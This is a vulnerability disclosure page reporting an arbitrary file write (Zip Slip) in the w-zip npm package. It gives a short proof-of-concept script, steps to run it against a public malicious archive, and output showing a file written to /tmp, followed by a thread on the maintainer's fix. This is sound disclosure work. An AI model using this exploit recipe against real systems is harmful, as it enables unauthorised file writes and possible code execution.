Path Traversal in yuda-lyu/w-zip

Valid

Reported on

Oct 11th 2021


Description

w-zip is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).

Proof of Concept

// PoC.js

var wz = require('w-zip');

let fpUnzip = './testData/outputZip'
let fpUnzipExtract = fpUnzip + '/extract'
let fpZip1 = fpUnzip + '/zipslip.zip'

async function checkzipslip() {

    //unzip
    console.log('unzip1 before')
    console.log('unzip1', await wz.mZip.unzip(fpZip1, fpUnzipExtract + '/zipslip'))
    console.log('unzip1 after')

}
checkzipslip()
    .catch((err) => {
        console.log(err)
    })

Execute the following commands in the terminal:

Download 
1. npm i w-zip# Install affected module
2. zipslip example file can be found at - https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip 
3. node poc.js #  Run the PoC

Output

─[user@parrot]─[~/node_modules/w-zip]
└──╼ $node  poc.js 
unzip1 before
unzip1 done: ./testData/outputZip/extract/zipslip
unzip1 after
┌─[user@parrot]─[~/node_modules/w-zip]
└──╼ $ls /tmp
evil.txt

Check the temp folder for the evil.txt file.

Impact

It may lead to Information Disclosure/DoS/RCE.

Occurences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the yuda-lyu/w-zip team and are waiting to hear back 2 months ago
We have sent a second follow up to the yuda-lyu/w-zip team. We will try again in 10 days. a month ago
sheldor2021
a month ago

Researcher


Thanks @admin

sheldor2021
a month ago

Researcher


@admin I see the @maintainer has added a commit - https://github.com/yuda-lyu/w-zip/commit/d7039d034e02fa358e6656565157cedf5fa83288 3 days back which fixes the issue reported here. However he has not approved the issue here. Can you please look into this ??

Jamie Slome
a month ago

Admin


I have dropped a message on the GitHub Issue, and 🤞 the maintainer will get back to us shortly.

yuda-lyu validated this vulnerability a month ago
sheldor2021 has been awarded the disclosure bounty
The fix bounty is now up for grabs
yuda-lyu confirmed that a fix has been merged on d7039d a month ago
The fix bounty has been dropped
mZip.mjs#L266 has been validated